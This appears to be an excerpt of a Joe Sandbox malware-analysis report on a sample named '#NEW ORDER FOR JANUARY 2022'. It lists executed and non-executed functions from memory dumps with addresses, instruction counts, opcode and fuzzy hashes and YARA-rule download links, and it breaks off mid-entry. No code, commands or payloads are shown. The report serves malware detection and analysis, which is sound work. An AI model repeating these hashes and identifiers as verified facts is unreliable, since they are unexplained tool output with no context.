                                • Opcode ID: ae9fd56e37020ae23c2f3b70ff64aa67a433054e39871e824e6a2735879c61d8
                                • Instruction ID: 547c046ad3eda1f1165cb166e9d9c9085d8786e070222519a4063df43f33a5cb
                                • Opcode Fuzzy Hash: ae9fd56e37020ae23c2f3b70ff64aa67a433054e39871e824e6a2735879c61d8
                                • Instruction Fuzzy Hash: C1115A30D14248AFDB05CFA4D965ADEBFF6AF8C310F148069ED45B6690CB714E00CB95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 058166B8, Relevance: .0, Instructions: 46COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f6cb1674d49f15273f9ebfa4bc5b35506d460410b3afa55b11968effab373fe5
                                • Instruction ID: c46f10086e3df8a91cac78ed54ad01c492fc1340d4a8aee656bccbe2cd4fd70d
                                • Opcode Fuzzy Hash: f6cb1674d49f15273f9ebfa4bc5b35506d460410b3afa55b11968effab373fe5
                                • Instruction Fuzzy Hash: 6C014C353042048FC704DF2AD888D1ABBFAFF8422471585AAE905CB331DB71EC41CB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 01760468, Relevance: .0, Instructions: 42COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cab80ac7af7fab63813e6c5c6c7fb725e2066d4f981953bf7ccc631dde461299
                                • Instruction ID: 567fd965808362b5ac090f712553cf1de1031a8eb6e18af164f106fad93a379e
                                • Opcode Fuzzy Hash: cab80ac7af7fab63813e6c5c6c7fb725e2066d4f981953bf7ccc631dde461299
                                • Instruction Fuzzy Hash: C6F0813D300214A7D60416ACB9157B9216BDB84F04F10405DE605AABC9CEFB5C4117A6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 01768D58, Relevance: .0, Instructions: 42COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e04b6d2d1fe900dc96f56db1a47087fca9985f8b0e59f248599170f4a3d1acfb
                                • Instruction ID: 2ff533cfb0271d9bea68e0e2631af62f88511aa23d2fbe09a070833a749d0e79
                                • Opcode Fuzzy Hash: e04b6d2d1fe900dc96f56db1a47087fca9985f8b0e59f248599170f4a3d1acfb
                                • Instruction Fuzzy Hash: CDF09067B0132267FB11054B9C54ABF7A4ADBE4661F094026EF4582240DA66CD91B2A1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05814457, Relevance: .0, Instructions: 42COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fbbc6d5839b41b33f3587530ec0d1e175ac064006a680add31fa9dcd037df981
                                • Instruction ID: 0dc0d8004389f19e583bd1e88ba01a2e87b449ff0e2d56eb7926ac988926ec03
                                • Opcode Fuzzy Hash: fbbc6d5839b41b33f3587530ec0d1e175ac064006a680add31fa9dcd037df981
                                • Instruction Fuzzy Hash: 61F0F471B046044F8220EB7CF49556E3BE7DFD55683518A2CD506CB391EF24AC0783E1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05819BC0, Relevance: .0, Instructions: 42COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0b28ccba1064a46e84e771a6ee65de12fab5c6301e51296e598064ff37e3436b
                                • Instruction ID: bcce73e06c005b4354f2b49c0eeb8cd346aef9b6df445a74333335f7ebb3896c
                                • Opcode Fuzzy Hash: 0b28ccba1064a46e84e771a6ee65de12fab5c6301e51296e598064ff37e3436b
                                • Instruction Fuzzy Hash: 66011370E14218ABDB04CFA5D954AEEBBF6AF88710F248069E945B7390DB715E00CBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05815AA0, Relevance: .0, Instructions: 42COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f1a2966f0af26862385048c9430e031dbf764b62d1a0b418c79143c08aa9ca48
                                • Instruction ID: cf2a85d5b6ebee9628af69a608fa44df865aabaa2038b4cac07d09ea4aa424e5
                                • Opcode Fuzzy Hash: f1a2966f0af26862385048c9430e031dbf764b62d1a0b418c79143c08aa9ca48
                                • Instruction Fuzzy Hash: 37018634754715CFCB289A259984923B7EAFBC4209B68882DDC02C6614EA71E981CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0581F840, Relevance: .0, Instructions: 36COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 713c072aaa6d460c56f19b8632f4e6e7409bf53de8b0946cb1adca8ebf8ff918
                                • Instruction ID: 8c9e535a60a0eebe641ec46af941c6081180751aff21411638203dd5504f14b6
                                • Opcode Fuzzy Hash: 713c072aaa6d460c56f19b8632f4e6e7409bf53de8b0946cb1adca8ebf8ff918
                                • Instruction Fuzzy Hash: E0F05E393106104F8748DB3ED85482977EFAFCD65431980B9EA06CB371EEB1DC018B90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05814468, Relevance: .0, Instructions: 36COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f2faacdbc42ea73b0cd470efc80a7071ed0ab75a096af83a80ba83714401eb2d
                                • Instruction ID: d3d130a6da811154f730a5a9cbd84b36580c9b1cde4be07214eefc89d9020fac
                                • Opcode Fuzzy Hash: f2faacdbc42ea73b0cd470efc80a7071ed0ab75a096af83a80ba83714401eb2d
                                • Instruction Fuzzy Hash: 16F06D757006044F8224EB68E59196E73EBDFD5994351882CD50B8B710EF24AC0787E2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05816960, Relevance: .0, Instructions: 33COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 269892e7475693521dee8829151704a7f62b07271309c12ba526b28d289bc2df
                                • Instruction ID: d73826987a0344ce840b1f13cf57a2cdb930a97b2578b73017b0dc22d028056c
                                • Opcode Fuzzy Hash: 269892e7475693521dee8829151704a7f62b07271309c12ba526b28d289bc2df
                                • Instruction Fuzzy Hash: 3CF0F0313147405BD720CB29AC09FA63B9AB781B24F04C62AFA94CF6E0D7B1DC019740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 01760561, Relevance: .0, Instructions: 32COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fc76f5b5bbe2f2f5935b6fb79fe67faea6e092484bbcbcd0d05624d499d5e172
                                • Instruction ID: 70fbfe75870652bf83bd6999f1b851193d2bca3e63ab04f9754fb7c7afb7e59f
                                • Opcode Fuzzy Hash: fc76f5b5bbe2f2f5935b6fb79fe67faea6e092484bbcbcd0d05624d499d5e172
                                • Instruction Fuzzy Hash: 66F024313043009FC706DB28E4586A83BE9EF4A59470410A6E805CB262CB358D46C7A1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05815A91, Relevance: .0, Instructions: 32COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 68d8da23ba1fe88f220c172d6ea77e7b7f69f227bb520259dcd5caa3be4f9b13
                                • Instruction ID: 58327b988ce732637d93391ef373ff94efce42dbaf94e74ae02da3d8114d5889
                                • Opcode Fuzzy Hash: 68d8da23ba1fe88f220c172d6ea77e7b7f69f227bb520259dcd5caa3be4f9b13
                                • Instruction Fuzzy Hash: 5EF0B430205B11CFD720CA31E98466377EABFC0219F14C96DDC4286950DB75E941CF80
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 01760570, Relevance: .0, Instructions: 27COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e4f545a78865b89e1e189f574fc8604b1fdb500642b12b564a43edef94a7cf96
                                • Instruction ID: cb55261b6c055f25a19ec85094a90fbc91bbb1e307d3432813ef2bd1c4804e86
                                • Opcode Fuzzy Hash: e4f545a78865b89e1e189f574fc8604b1fdb500642b12b564a43edef94a7cf96
                                • Instruction Fuzzy Hash: 2FE02B35300600AFC305EB6DF448A5D73DDEB489E4B105068E909CB361CF36DC4687A1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 01760260, Relevance: .0, Instructions: 24COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0e7619e2bd06b56766d3455786e7ec9f64e102c34f43c704cdb9712e79041fa6
                                • Instruction ID: 5c7b31975bf6307546c4fd97343ce6cd0a22374ec48244ba48d3c1006fd7573b
                                • Opcode Fuzzy Hash: 0e7619e2bd06b56766d3455786e7ec9f64e102c34f43c704cdb9712e79041fa6
                                • Instruction Fuzzy Hash: A7E08631340620AFC7109B79E909B65BBED9F8C621F1480A9FA4ACB3E1EA659C41CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 01760521, Relevance: .0, Instructions: 22COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 11161ad514610df1228cb62c4fa280fff2cf7c1facce59beacace473fe7fc9ea
                                • Instruction ID: dc301c744e0d4610f2dbc124698eeb03cdbbe1cf2b67c810f485f22929d654c8
                                • Opcode Fuzzy Hash: 11161ad514610df1228cb62c4fa280fff2cf7c1facce59beacace473fe7fc9ea
                                • Instruction Fuzzy Hash: B6E04F343487849FC7468B78E8559253BB9EB4A66431551EAEC09CF3A2CA36EC41CB62
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0581C37B, Relevance: .0, Instructions: 21COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 26291fe94d2c69fe7ec863cc812278ba54218d4a559c5bc0cb41305a3e5b055a
                                • Instruction ID: 18c7c78141927ca05ff7404597c17ecfe75c5f780c8cf83ac342b1a8006d951d
                                • Opcode Fuzzy Hash: 26291fe94d2c69fe7ec863cc812278ba54218d4a559c5bc0cb41305a3e5b055a
                                • Instruction Fuzzy Hash: BAE06D70D4024D9FCB14CFA4C941EAEBBB1AF40204F608459C801EB715C7745D06CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 01760B58, Relevance: .0, Instructions: 20COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cbc0c55db7379b4dcb9af990d89d02535846e1784f9e839bc818dbd92f3cfa6e
                                • Instruction ID: 3337aa0e2a58d1c21f24f9ee5d3c794041a641eb740eebbfab8b37ecc845db88
                                • Opcode Fuzzy Hash: cbc0c55db7379b4dcb9af990d89d02535846e1784f9e839bc818dbd92f3cfa6e
                                • Instruction Fuzzy Hash: 76E04F70A0534DDFCB91DF68EA451EDBBB8FB86308F1045EED808D7251D6351E09AB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0176DA30, Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a21e173969a94a38e1460258799a642d8843adb56dafffa1552e83113243d330
                                • Instruction ID: ff578694c192fd01e6e0e56f23148f611eae1f64ad9378e770eddbbb1bb274e0
                                • Opcode Fuzzy Hash: a21e173969a94a38e1460258799a642d8843adb56dafffa1552e83113243d330
                                • Instruction Fuzzy Hash: 43E0B674E0420CAFCB44EFB8E44959DBBF5AF48218F0185E9A909E7350EF746E448F81
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 01760B68, Relevance: .0, Instructions: 16COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d6bd4a3112e4abdcf67f3837b149803d6cd5455861b6d96aedf4e1363a29fbf0
                                • Instruction ID: 6c6c7181689f57853b285a421085effaaa9045212ee2775f2c3ff75ae970da71
                                • Opcode Fuzzy Hash: d6bd4a3112e4abdcf67f3837b149803d6cd5455861b6d96aedf4e1363a29fbf0
                                • Instruction Fuzzy Hash: 0BD05E70A0120DEFCB80EFA8EA0149DB7FDEB85208B1044ECD80DE3300EA316F049B80
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 01768D20, Relevance: .0, Instructions: 16COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8b413a89fbbdfbbc259ee80f7d329a10155a7c40fce74cfee8c4e082f3927eb2
                                • Instruction ID: fd607f5dc946d9eb2dfe51813de0a0d22311ca5893586f0e3a5a5469ad9ac387
                                • Opcode Fuzzy Hash: 8b413a89fbbdfbbc259ee80f7d329a10155a7c40fce74cfee8c4e082f3927eb2
                                • Instruction Fuzzy Hash: B2D0A9327002208F8708EBACF408858B3EEAF8912431040EAE40ACB371DE20EC408BD0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 01760530, Relevance: .0, Instructions: 14COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 650c80ba5ac71b43da1d53c8e9a3e820b876a4d8987dec199bd3fc48a6cba0b4
                                • Instruction ID: fa5a3cba5f985df31e1b5cee486d882fef38b834cfb3c7322281648a3c9e7987
                                • Opcode Fuzzy Hash: 650c80ba5ac71b43da1d53c8e9a3e820b876a4d8987dec199bd3fc48a6cba0b4
                                • Instruction Fuzzy Hash: 00D0A7343403448FC744DB6CF04892573BEEB8C6203105099ED09CB365CE31EC408F61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 017604F8, Relevance: .0, Instructions: 14COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 31fde10b6a319c0bc816edd46cf9790f8caf3404aef029df8d2b2590f26acea5
                                • Instruction ID: 360bbe38f05c8dec9cc2855c418678ae5ba5e370d07cfa36a311127bf40db1ad
                                • Opcode Fuzzy Hash: 31fde10b6a319c0bc816edd46cf9790f8caf3404aef029df8d2b2590f26acea5
                                • Instruction Fuzzy Hash: E3D0A9300083488FC7022B70A81C2683BB9EA82720B4000FAE4048B022F6B90880CB20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0176DA08, Relevance: .0, Instructions: 9COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 43b52df32746126167e9a691690ea1414df0adc5f79f25da014dfe3f51639601
                                • Instruction ID: 9d7f6caa3995c045baf81117a0c16e5ba3a3906771641ece32c80aacf67b32f9
                                • Opcode Fuzzy Hash: 43b52df32746126167e9a691690ea1414df0adc5f79f25da014dfe3f51639601
                                • Instruction Fuzzy Hash: 30B0927090930CAF8610DAA9980191AB7ACDA0A118B0206D9EA0887310DA72AD105AD2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0176E518, Relevance: .0, Instructions: 7COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ef3a278abdda990c12ae330beb7d35a91a7e34579e7b5a77309ca2b9d0180c51
                                • Instruction ID: 3253784eb692652349c4b8ab08b03383ad6853cc6c4a5deac21c71ab622cd1ae
                                • Opcode Fuzzy Hash: ef3a278abdda990c12ae330beb7d35a91a7e34579e7b5a77309ca2b9d0180c51
                                • Instruction Fuzzy Hash: FBB0123000470D8F8680BFA4F40BC043B2C9640A2CBC08950E10CC54359E7828C5C78C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 01760508, Relevance: .0, Instructions: 7COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d6a82a2c2fe3755c80026424e7babf4f5c3ac46372711aab266463c8d577a59b
                                • Instruction ID: 1004a859cff2bc75d39050e09d983c9fa26610baa4b8efa95ca3043267a744b5
                                • Opcode Fuzzy Hash: d6a82a2c2fe3755c80026424e7babf4f5c3ac46372711aab266463c8d577a59b
                                • Instruction Fuzzy Hash: 58B0123054030C8BCA1137B0709C21CB7DC9B44711F800013A40E82205DEB654804740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0176F140, Relevance: .0, Instructions: 7COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 247994df99789a7397dcc5b6ad127842fc66c1280e51bd5ad68a313250301f7c
                                • Instruction ID: 1e014c4de74614c6189226666da45aa36d6f42bf6c7995d8868e985e9138abc5
                                • Opcode Fuzzy Hash: 247994df99789a7397dcc5b6ad127842fc66c1280e51bd5ad68a313250301f7c
                                • Instruction Fuzzy Hash: 79B0123020470D4B8640ABA4F44A85C3B1C99405187A0C550A20C854196E782844878C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 05817589, Relevance: .8, Instructions: 783COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2b4931e7fab06b7eb9945d54fb6d9dcdae0a105d36f5d49d6653023f021bcdba
                                • Instruction ID: a1bb9d4b4c00c0146831cd856c51ccbb5d147a46656d09eec16200b0700ea42c
                                • Opcode Fuzzy Hash: 2b4931e7fab06b7eb9945d54fb6d9dcdae0a105d36f5d49d6653023f021bcdba
                                • Instruction Fuzzy Hash: B6622AB06006049BD748EF19D49871A7AE6FB9430CF64C56CC10A9F392DBBBD90B9B91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05817598, Relevance: .8, Instructions: 780COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 34793a44382de8d9cc14633e683e31211e5b984c652409ae0a95406fbb7d99e6
                                • Instruction ID: 61bbb9e493413b1934565cf008c411c0c5c18ba23a7efe6ed536d6b571369866
                                • Opcode Fuzzy Hash: 34793a44382de8d9cc14633e683e31211e5b984c652409ae0a95406fbb7d99e6
                                • Instruction Fuzzy Hash: 25621AB06006049BD748EF19D49871A7AE6FB9430CF64C56CC10A9F392DFBBD90B9B91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05816E00, Relevance: .5, Instructions: 498COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bd3a28abf541dac9b956cfee06e34f9123e2ece589ee3905b2771a05e38743de
                                • Instruction ID: d20a9ff53eaf64b35b13f3aae45c6ec7b95d73fdb3aa6c30dc4cc60a000a6944
                                • Opcode Fuzzy Hash: bd3a28abf541dac9b956cfee06e34f9123e2ece589ee3905b2771a05e38743de
                                • Instruction Fuzzy Hash: 7E12BE30A042099FCB15DF68D884AAEBBF6FF84314F558569ED45EB261DB30EC46CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 08110E80, Relevance: .4, Instructions: 352COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 901d4ec02da68f07260b6190d67c0590e8c8ffc39e74057c8236b5bf31ec96c3
                                • Instruction ID: 91e789348276eb3fa5ae58b262bb6cf82fc3d1796545d62301f0c4398dd436ec
                                • Opcode Fuzzy Hash: 901d4ec02da68f07260b6190d67c0590e8c8ffc39e74057c8236b5bf31ec96c3
                                • Instruction Fuzzy Hash: 10B14B36F512259BCB08CEB8DC922AA75E79BCC7207169136E806EF354DE35DD4287C2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 08110E90, Relevance: .3, Instructions: 349COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c1be4057c8619b19864b7cd5a7aee78b8848c974c45c585b4c0a7930fb6ef5ad
                                • Instruction ID: fb389c1b64cbe722f157fa9737d25c3b46d92ac23ea8034690722b67fb735d0d
                                • Opcode Fuzzy Hash: c1be4057c8619b19864b7cd5a7aee78b8848c974c45c585b4c0a7930fb6ef5ad
                                • Instruction Fuzzy Hash: 25B12936F512359BCB08CAB9DC522AA75E79BCC7207169136E806EF354DE39DC0287C2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0811AB58, Relevance: .3, Instructions: 265COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8bd7fbbb941ac7df7310e12784bf76b8dfffed9663045fa33c7c9517127ad9a6
                                • Instruction ID: 521f909593300e45af908d3fa996966672755fb1aa9fc88f7779e772beefab05
                                • Opcode Fuzzy Hash: 8bd7fbbb941ac7df7310e12784bf76b8dfffed9663045fa33c7c9517127ad9a6
                                • Instruction Fuzzy Hash: 91A19C36E00219CFCF09DFA5C8446DEBBB2FF88311B15817AE805BB221EB35A955CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 08113B2C, Relevance: .2, Instructions: 219COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 56a995ead3b576dc892a9bb0f21c0514d3ff85afa501e0919ebbd81b066cfa05
                                • Instruction ID: 51f4516d9b3560cc6d2db732c406cec6b73ada57719cb7d27ac9e52ff3cf5ff5
